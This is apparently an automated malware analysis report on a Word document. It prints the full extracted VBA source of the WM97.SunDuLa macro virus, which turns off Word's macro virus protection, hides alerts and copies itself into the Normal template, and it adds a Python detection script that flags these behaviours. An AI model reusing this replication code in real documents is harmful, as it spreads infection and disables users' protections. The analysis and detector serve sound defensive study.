Verdict: MALICIOUS (Risk Score: 140)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
ClamAV identifies the file as malicious with the signature Doc.Trojan.Sundula-1. Static analysis found VBA macro code in the document. The extracted macro (see the preview below) runs from the Document_Close auto-execution handler, sets Options.VirusProtection to False and suppresses alerts, the status bar and screen updates. It then uses the VBProject object model to copy itself between the active document and the Normal template (NormalTemplate.VBProject.VBComponents(1).CodeModule), using the comment line 'WM97.SunDuLa in line 1 of the module as its infection marker, and on roughly one run in twelve it hides the Visual Basic Editor, disables the Cancel key and shows one of a set of joke message boxes (the self-identifying message in Case 15 is unreachable, since RandomNumber only ranges from 1 to 14). The document body and metadata are minimal. The extracted code contains no download, file-write or payload-execution logic, so the behaviour is that of a classic self-replicating Word 97 macro virus (WM97.SunDuLa) rather than a downloader or dropper; the VirusProtection and UI changes serve to keep the infection silent, not to stage a second-stage payload.
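The indicators listed in the summary can be checked mechanically against the decoded VBA source that olevba writes out (the macros.bas artifact below). The following Python is an added example, not code from this report or from oletools: it scores a macro on auto-execution, disabling of VirusProtection, UI suppression, and the VBProject-plus-CodeModule-write combination that marks self-replication, and treats the SunDuLa marker comment as a family signature. The indicator names, weights, verdict thresholds and the SAMPLE_VBA and BENIGN_VBA excerpts are all constructed for the example; SAMPLE_VBA mirrors the macro in the preview but is not the full artifact.

```python
"""Triage heuristics for VBA source extracted from an Office document.

Added example (not the analyzer's own code). Feed it the text that
olevba produces, e.g. the contents of macros.bas, and it reports which
macro-virus behaviours are present and a cumulative score.
"""
import re
from dataclasses import dataclass, field

# (indicator name, weight, regex). Weights and names are assumptions made
# for this example. Matching is case-insensitive because VBA identifiers are.
INDICATORS = [
    ("autoexec_document_close", 3, r"\bSub\s+Document_Close\s*\("),
    ("autoexec_document_open", 3, r"\bSub\s+(Document_Open|AutoOpen|AutoExec)\s*\("),
    ("disable_virus_protection", 5, r"\.VirusProtection\s*=\s*False"),
    ("suppress_alerts", 1, r"\.DisplayAlerts\s*=\s*False"),
    ("hide_vbe", 2, r"\bShowVisualBasicEditor\s*=\s*False"),
    ("block_cancel_key", 2, r"\.EnableCancelKey\s*=\s*wdCancelDisabled"),
    ("vbproject_access", 4, r"\.VBProject\.VBComponents\("),
    ("normal_template_write", 5, r"\bNormalTemplate\.VBProject\b"),
    ("codemodule_injection", 4, r"\.(InsertLines|DeleteLines|ReplaceLine)\b"),
    ("sundula_marker", 5, r"^\s*'WM97\.SunDuLa\s*$"),
]


@dataclass
class TriageResult:
    score: int = 0
    hits: dict = field(default_factory=dict)  # indicator name -> [(line_no, text)]

    @property
    def self_replicating(self) -> bool:
        # Replication needs a handle on a VBProject *and* a code-module write;
        # either alone is unusual in document automation but not conclusive.
        return "vbproject_access" in self.hits and "codemodule_injection" in self.hits


def triage_vba(source: str) -> TriageResult:
    """Scan decoded VBA source line by line and collect matching indicators."""
    result = TriageResult()
    lines = source.splitlines()
    for name, weight, pattern in INDICATORS:
        rx = re.compile(pattern, re.IGNORECASE)
        found = [(i, ln.strip()) for i, ln in enumerate(lines, 1) if rx.search(ln)]
        if found:
            result.hits[name] = found
            result.score += weight
    return result


def verdict(result: TriageResult) -> str:
    """Map a TriageResult to a verdict; thresholds are this example's choice."""
    if result.self_replicating or "disable_virus_protection" in result.hits:
        return "malicious"
    if result.score >= 4:
        return "suspicious"
    return "clean"


# Constructed excerpt mirroring the macro shown in the report's preview.
SAMPLE_VBA = """\
'WM97.SunDuLa
Private Sub Document_Close()
On Error Resume Next
With Options
.VirusProtection = False
End With
Set norm = NormalTemplate.VBProject.VBComponents(1).codemodule
Set doc = ActiveDocument.VBProject.VBComponents(1).codemodule
If norm.Lines(1, 1) <> "'WM97.SunDuLa" Then
norm.DeleteLines 1, norm.CountOfLines
norm.InsertLines 1, doc.Lines(1, doc.CountOfLines)
End If
End Sub
"""

# Constructed benign macro for comparison: formatting only, no object-model abuse.
BENIGN_VBA = """\
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = triage_vba(src)
        print(f"{label}: {verdict(r)} score={r.score} indicators={sorted(r.hits)}")
```

Either Options.VirusProtection = False or the VBProject-plus-CodeModule-write pair is enough for a malicious verdict on its own, since ordinary document automation has no reason to do either; the remaining indicators only raise the score. On the constructed excerpt this yields six indicators, a score of 26 and the verdict "malicious"; the benign macro scores 0.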
Heuristics (2)
- ClamAV: Doc.Trojan.Sundula-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Sundula-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8635 bytes |

SHA-256: 2a53b5372aca0eb197bc2370288de1f5739a7557c200da892f9d554c2a30c4c5

Detection
- ClamAV: Doc.Trojan.Sundula-1
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'WM97.SunDuLa
Private Sub Document_Close()
On Error Resume Next
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = False
End With
Set norm = NormalTemplate.VBProject.VBComponents(1).codemodule
Set doc = ActiveDocument.VBProject.VBComponents(1).codemodule
If norm.Lines(1, 1) <> "'WM97.SunDuLa" Then
norm.DeleteLines 1, norm.CountOfLines
norm.InsertLines 1, doc.Lines(1, doc.CountOfLines)
norm.replaceline 70, "Sub ViewVBcode()"
ElseIf doc.Lines(1, 1) <> "'WM97.SunDuLa" Then
doc.DeleteLines 1, doc.CountOfLines
doc.InsertLines 1, norm.Lines(1, norm.CountOfLines)
doc.replaceline 70, "Sub Toolsmacro()"
End If
Randomize
If Int(Rnd * 12) = 2 Then
Application.EnableCancelKey = wdCancelDisabled
ShowVisualBasicEditor = False
Dim RandomNumber As Integer
RandomNumber = Int((Val(14) * Rnd) + 1)
Select Case RandomNumber
Case 1
MsgBox "Squirrels have fluffy tails!!", vbInformation, "Did you know?"
Case 2
MsgBox "Baboons have red butts!!", vbInformation, "Did you know?"
Case 3
MsgBox "Cows sleep standing up!!", vbInformation, "Did you know?"
Case 4
MsgBox "The average penis is 6 inchs long!!", vbInformation, "Did you know?"
Case 5
MsgBox "The average vagina is 9 inchs deep!!", vbInformation, "Did you know?"
Case 6
MsgBox "Flying squirrels don't fly they glide!!", vbInformation, "Did you know?"
Case 7
MsgBox "Life sucks!!", vbInformation, "Did you know?"
Case 8
MsgBox "Vampires are not real!!", vbInformation, "Did you know?"
Case 9
MsgBox "Werewolfs are not real!!", vbInformation, "Did you know?"
Case 10
MsgBox "The most dangerous wild animal is a deer!!", vbInformation, "Did you know"
Case 11
MsgBox "The platypus is the only mammal that lays eggs!!", vbInformation, "Did you know?"
Case 12
MsgBox "Flys live for about two days!!", vbInformation, "Did you know?"
Case 13
MsgBox "Turtles have shells!!", vbInformation, "Did you know?"
Case 14
MsgBox "Fish live in water!!", vbInformation, "Did you know?"
Case 15
MsgBox "You are infected with WM97.SunDuLa By Psyclone X [PE]!!", vbInformation, "Did you know?"
End Select
End If
End Sub
Sub Toolsmacro()
End Sub
' Processing file: /opt/analyzer/scan_staging/46d668465c47423c90dd128721c5be4d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5248 bytes
' Line #0:
' QuoteRem 0x0000 0x000C "WM97.SunDuLa"
' Line #1:
' FuncDefn (Private Sub Document_Close())
' Line #2:
' OnError (Resume Next)
' Line #3:
' Line #4:
' StartWithExpr
' Ld Options
' With
' Line #5:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #6:
' LitVarSpecial (False)
' MemStWith SaveNormalPrompt
' Line #7:
' LitVarSpecial (False)
' MemStWith ConfirmConversions
' Line #8:
' EndWith
' Line #9:
' Line #10:
' StartWithExpr
' Ld Application
' With
' Line #11:
' LitVarSpecial (False)
' MemStWith ScreenUpdating
' Line #12:
' LitVarSpecial (False)
' MemStWith DisplayStatusBar
' Line #13:
' LitVarSpecial (False)
' MemStWith DisplayAlerts
' Line #14:
' EndWith
' Line #15:
' Line #16:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd codemodule
' Set norm
' Line #17:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd codemodule
' Set doc
' Line #18:
' Line #19:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld norm
' ArgsMemLd Lines 0x0002
' LitStr 0x000D "'WM97.SunDuLa"
' Ne
' IfBlock
' Line #20:
' LitDI2 0x0001
' Ld
... (truncated)